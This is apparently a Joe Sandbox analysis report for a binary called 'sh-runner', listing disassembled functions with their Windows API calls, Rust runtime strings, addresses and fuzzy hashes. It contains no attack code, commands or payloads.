Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: memcpy
String ID: program path has no file name
API String ID: 3510742995-697003637
Opcode ID: a68755110dcd1bfccc73a3eed03bb660f4e085dde23da3dd5d5d09b39b40e36c
Instruction ID: 11b892e146682508c91ac1aa0dee6e8a5fec733c41b760859141cc7e5095e15a
Opcode Fuzzy Hash: a68755110dcd1bfccc73a3eed03bb660f4e085dde23da3dd5d5d09b39b40e36c
Instruction Fuzzy Hash: 17A1C362B0879286FF189B699C007EDA651FB04B98FC48531CD5C57BAADF7DE1828710

Function 00007FF72BD01F70 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 196COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF72BD01FBF

Part of subcall function 00007FF72BD1D8B0: GetStdHandle.KERNEL32(?,?,?,?,?,00000000,?,?), ref: 00007FF72BD1D8DF
Part of subcall function 00007FF72BD1D8B0: GetLastError.KERNEL32(?,?,?,?,?,00000000,?,?), ref: 00007FF72BD1D8EF

memcpy.MSVCRT ref: 00007FF72BD020A3

Strings

assertion failed: filled <= self.buf.init, xrefs: 00007FF72BD02235

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorHandleLastmemcpymemset
String ID: assertion failed: filled <= self.buf.init
API String ID: 3211292799-906094691
Opcode ID: 049283549ca690784369705e02f6b546d2a81ea62e0b8237ba077bf55714be05
Instruction ID: 17fc8748358d73e0ed8df64f2ebfdb22564569fba723c34abb7c1fb9d9ea4563
Opcode Fuzzy Hash: 049283549ca690784369705e02f6b546d2a81ea62e0b8237ba077bf55714be05
Instruction Fuzzy Hash: E9711862B09B4182EA0CEB6A9D003BAA750FF45BC8F844835DE9D477A5DF3CE095D720

Function 00007FF72BCFAAC0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF72BCFAAE6
memset.MSVCRT ref: 00007FF72BCFAB93

Strings

assertion failed: filled <= self.buf.init, xrefs: 00007FF72BCFACA1

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: memcpymemset
String ID: assertion failed: filled <= self.buf.init
API String ID: 1297977491-906094691
Opcode ID: 020880ebbf3e5536c508f2b93f5e9482472d10ce66a5751a697a7e61c8158c60
Instruction ID: 5c263379943fc4d10b35e89603866c646f7036c753e57e9377c518364672e26c
Opcode Fuzzy Hash: 020880ebbf3e5536c508f2b93f5e9482472d10ce66a5751a697a7e61c8158c60
Instruction Fuzzy Hash: 4B511992B04B8542EA15AB2E99103FAD761EF48BD4F98C132DE5D47375DE3DE1C28310

Function 00007FF72BCFACC0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF72BCFAD22

Part of subcall function 00007FF72BD1D8B0: GetStdHandle.KERNEL32(?,?,?,?,?,00000000,?,?), ref: 00007FF72BD1D8DF
Part of subcall function 00007FF72BD1D8B0: GetLastError.KERNEL32(?,?,?,?,?,00000000,?,?), ref: 00007FF72BD1D8EF

memset.MSVCRT ref: 00007FF72BCFADA1
memcpy.MSVCRT ref: 00007FF72BCFAE26

Strings

assertion failed: filled <= self.buf.init, xrefs: 00007FF72BCFAE65

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: memset$ErrorHandleLastmemcpy
String ID: assertion failed: filled <= self.buf.init
API String ID: 4037564346-906094691
Opcode ID: a4d6739ca7e60efa2ccbbf7675f3c40d8c078b6be79a0496134661200a6b8338
Instruction ID: 55357bbb0f8eba7877c0a19d6b073c85a245f54c59e00515c190169cdf99756c
Opcode Fuzzy Hash: a4d6739ca7e60efa2ccbbf7675f3c40d8c078b6be79a0496134661200a6b8338
Instruction Fuzzy Hash: 2E41E862B05B4156DE18EB2AED102A5E761FB48790F848836DF6E43B71DF3CF1E18210

Function 00007FF72BD1BD48 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF72BD1BD52
CloseHandle.KERNEL32 ref: 00007FF72BD1BD67
CloseHandle.KERNEL32 ref: 00007FF72BD1C224

Strings

program path has no file name, xrefs: 00007FF72BD1C290

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: CloseHandle
String ID: program path has no file name
API String ID: 2962429428-697003637
Opcode ID: 53e9b4ad406de20670141078e0d472c3f5fc7f28f65801387bdc58cd776c8606
Instruction ID: d381149ac5e6502471d961e0e0385692a9a6a5d7faaed3762b2a58f3686aee43
Opcode Fuzzy Hash: 53e9b4ad406de20670141078e0d472c3f5fc7f28f65801387bdc58cd776c8606
Instruction Fuzzy Hash: 75419766B1858285EB68BB6D9C003F99350EF89B94FC41436DE0D4B7A5DE39D5818B20

Function 00007FF72BD19E83 Relevance: 6.1, APIs: 4, Instructions: 96COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF72BD19FF6
GetSystemDirectoryW.KERNEL32 ref: 00007FF72BD1A001
GetLastError.KERNEL32 ref: 00007FF72BD1A00C
GetLastError.KERNEL32 ref: 00007FF72BD1A020

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorLast$DirectorySystem
String ID:
API String ID: 860285823-0
Opcode ID: 91017c7d2519a45b9b1f236946f03773d418f02b60e1f79754b2fad199aa389c
Instruction ID: a8d185d241b62f372e775a11c80685c2ed81c51d767e7cc50c018112afdd599c
Opcode Fuzzy Hash: 91017c7d2519a45b9b1f236946f03773d418f02b60e1f79754b2fad199aa389c
Instruction Fuzzy Hash: 57412322A15EA144E778AE38DC043FAA280FB44759F801139DA5D8BBD9DF3CE5428B20

Function 00007FF72BCF4BE0 Relevance: 6.1, APIs: 4, Instructions: 94sleepsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF72BCF4CAB
CloseHandle.KERNEL32 ref: 00007FF72BCF4CB6
CloseHandle.KERNEL32 ref: 00007FF72BCF4CC6
Sleep.KERNEL32 ref: 00007FF72BCF4D0F

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: CloseHandle$ObjectSingleSleepWait
String ID:
API String ID: 2593906732-0
Opcode ID: 0b830fd4423ef8efd6f3cb6563c7a5198bdecd6a9065a39ced86b85448b3e9b9
Instruction ID: 3324d856f3ba7a63e1125872ec28a2c6a2db45199731a61dbafa2879ef723805
Opcode Fuzzy Hash: 0b830fd4423ef8efd6f3cb6563c7a5198bdecd6a9065a39ced86b85448b3e9b9
Instruction Fuzzy Hash: 14213822F09A4206FF1CA66D7D217749146DFC93A0E8CA33AEE1E467F9DD3CB4814A10

Function 00007FF72BD6A710 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF72BD6A78E
RtlUnwindEx.KERNEL32 ref: 00007FF72BD6A7AC
abort.MSVCRT ref: 00007FF72BD6A7B2
abort.MSVCRT ref: 00007FF72BD6A7D0

Part of subcall function 00007FF72BD6A6D0: RaiseException.KERNEL32 ref: 00007FF72BD6A6FB

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: abort$CaptureContextExceptionRaiseUnwind
String ID:
API String ID: 4122134289-0
Opcode ID: d58e9ce648b1a0319dfa7293510e667b9568abe884a28bd8b7690c907cebcaab
Instruction ID: 92478db78a73c76f264482ecf0f7b198de7bf60132a29dea159a35fec231d469
Opcode Fuzzy Hash: d58e9ce648b1a0319dfa7293510e667b9568abe884a28bd8b7690c907cebcaab
Instruction Fuzzy Hash: 2D11B132918EC581E724AF65E8003E9B370FB8CB84F501235EA8D13B69CF38D195CB10

Function 00007FF72BD09810 Relevance: 6.0, APIs: 4, Instructions: 45synchronizationCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF72BD09845
WaitForSingleObject.KERNEL32 ref: 00007FF72BD09857
GetLastError.KERNEL32 ref: 00007FF72BD09880

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorLast$ObjectSingleWait
String ID:
API String ID: 2406892700-0
Opcode ID: c37556abf3a020f25dde4dfb99e3e47babbb23f5179f9352ba51e197d9bd2da5
Instruction ID: 552ce43fc008eeaa0941128502b2c82644e38b09421e60d486672402dc324699
Opcode Fuzzy Hash: c37556abf3a020f25dde4dfb99e3e47babbb23f5179f9352ba51e197d9bd2da5
Instruction Fuzzy Hash: 41017C15F2C54699FB6CB67E5D012F98255DF68780FD40830DE0D427E6DE2CE5828A30

Function 00007FF72BD098B0 Relevance: 6.0, APIs: 4, Instructions: 40synchronizationCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF72BD098D3
WaitForSingleObject.KERNEL32 ref: 00007FF72BD098E4
GetLastError.KERNEL32 ref: 00007FF72BD098ED
GetExitCodeProcess.KERNEL32 ref: 00007FF72BD09913

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
String ID:
API String ID: 2321548817-0
Opcode ID: a28bc2daecc7b087ba31efa09389819d5da8d887621205d0725bce4dca8923a9
Instruction ID: 6e9b6173325fdd1796beceb9196f1ae981b684ae8ba930cca05afed9766c7626
Opcode Fuzzy Hash: a28bc2daecc7b087ba31efa09389819d5da8d887621205d0725bce4dca8923a9
Instruction Fuzzy Hash: 15017572B1464196F758EA6DE9003E9A390EB48780F549030DF5C837D5DF3CD591C720

Function 00007FF72BCFF660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,00007FF72BCFF267), ref: 00007FF72BCFF6DE
WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72BCFF267), ref: 00007FF72BCFF7E9

Strings

lock count overflow in reentrant mutexstd\src\sync\reentrant_lock.rs, xrefs: 00007FF72BCFF715, 00007FF72BCFF83B

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: AddressSingleWake
String ID: lock count overflow in reentrant mutexstd\src\sync\reentrant_lock.rs
API String ID: 3114109732-1515065283
Opcode ID: 6574a8f12a73f2ae729c440015dedf44f8c184b49fbe50fa14d34e0f80832e44
Instruction ID: 10ad0c19a3b2aab6ff49a74408b2d71f7ca16ec8508fbec10bb6eea3a3355c18
Opcode Fuzzy Hash: 6574a8f12a73f2ae729c440015dedf44f8c184b49fbe50fa14d34e0f80832e44
Instruction Fuzzy Hash: 98519822A0958246E628BB1DEC543B9E750EB41794F948132D79E437F1DF3CF4868B20

Function 00007FF72BD14C50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 145networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 00007FF72BD14D04

Strings

assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 00007FF72BD14E1E
assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FF72BD14E36

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorLast
String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
API String ID: 1452528299-3544120690
Opcode ID: c3911f9b81918587c0b4cb388ab499344e0613332c6cfb78e9a4b96b604dde71
Instruction ID: 64e81062b8ea1bc470168925edf25ef2c931131e39bb9870ae3cbde7dbd6779d
Opcode Fuzzy Hash: c3911f9b81918587c0b4cb388ab499344e0613332c6cfb78e9a4b96b604dde71
Instruction Fuzzy Hash: 2751E032A145918AF778AF69E8412FDB3B0FB44358F549139EE9D03AA4DE3CA581CF10

Function 00007FF72BCD3500 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117networkCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF72BCD3533
WSAStartup.WS2_32 ref: 00007FF72BCD353F

Strings

main, xrefs: 00007FF72BCD35D3

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: Startupmemset
String ID: main
API String ID: 1873301828-3207122276
Opcode ID: 5e7a4f44316e32eaf9dee5cd7f25c5174312c24d9c81cd2afdbdf35aa7c482f0
Instruction ID: c3345c4dcedc120f3ca31c98474a569dddc491aad78624a71e6d6f01f2ad9850
Opcode Fuzzy Hash: 5e7a4f44316e32eaf9dee5cd7f25c5174312c24d9c81cd2afdbdf35aa7c482f0
Instruction Fuzzy Hash: 2F419326A04A4385EB65AF1DEC457EAA364FB88B84FC48031DE4D473A5DF3CE586C760

Function 00007FF72BD1C15B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

FreeEnvironmentStringsW.KERNEL32 ref: 00007FF72BD1C198
CloseHandle.KERNEL32 ref: 00007FF72BD1C224

Strings

program path has no file name, xrefs: 00007FF72BD1C290

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: CloseEnvironmentFreeHandleStrings
String ID: program path has no file name
API String ID: 2431795302-697003637
Opcode ID: bb33e71a8487094f8f3af150614d1764cca13a237b3b36ed40153029343f014f
Instruction ID: ad14ddc1da3bb19fd883d82a152cd29766653af014463b768cd78bb0ffeec67b
Opcode Fuzzy Hash: bb33e71a8487094f8f3af150614d1764cca13a237b3b36ed40153029343f014f
Instruction Fuzzy Hash: FD319662B1864241EF18BB6A9C002F99750FF85BC4FC85836DD0D4B7A6DE3DE581CB20

Function 00007FF72BD1C18C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

FreeEnvironmentStringsW.KERNEL32 ref: 00007FF72BD1C198
CloseHandle.KERNEL32 ref: 00007FF72BD1C224

Strings

program path has no file name, xrefs: 00007FF72BD1C290

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: CloseEnvironmentFreeHandleStrings
String ID: program path has no file name
API String ID: 2431795302-697003637
Opcode ID: 26d9d0ab86754a4c96a9833d086fb707cbd07cccffc104ef706268925d4f66c9
Instruction ID: bcddd374341bc3bfeab35e295799cfc2d8368908a446caa7c3a76e6b4c166e66
Opcode Fuzzy Hash: 26d9d0ab86754a4c96a9833d086fb707cbd07cccffc104ef706268925d4f66c9
Instruction Fuzzy Hash: FD319662A1854191EF28BB6A9C002F99350FF85BD4FC81836DE0D4B766DE39E541CB20

Function 00007FF72BD1E170 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,00007FF72BD0AB68,?,?,?,?,?,?,00007FF72BCF4D36), ref: 00007FF72BD1E195
GetLastError.KERNEL32(?,?,?,?,?,?,00007FF72BD0AB68,?,?,?,?,?,?,00007FF72BCF4D36), ref: 00007FF72BD1E230

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF72BD1E24D

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorFrequencyLastPerformanceQuery
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 3362413890-2333694755
Opcode ID: d989155210a2c77213bae5babb0edb5687693b73d0462da1ae5999daa73c0dd9
Instruction ID: 8f29ef029ecf20d0cff312ab6e48adf385c8cc9c3e1838dc7d933c7b00d7f180
Opcode Fuzzy Hash: d989155210a2c77213bae5babb0edb5687693b73d0462da1ae5999daa73c0dd9
Instruction Fuzzy Hash: A431C411B19B4643EB0CBB7DAC152F9A751DF88B80F849036CD4E077A5DE2CA5418B60

Function 00007FF72BD21CD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,00007FF72BD0DB02), ref: 00007FF72BD21D4C
TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,00007FF72BD0DB02), ref: 00007FF72BD21DA9

Strings

assertion failed: is_unlocked(state), xrefs: 00007FF72BD21D74

Memory Dump Source

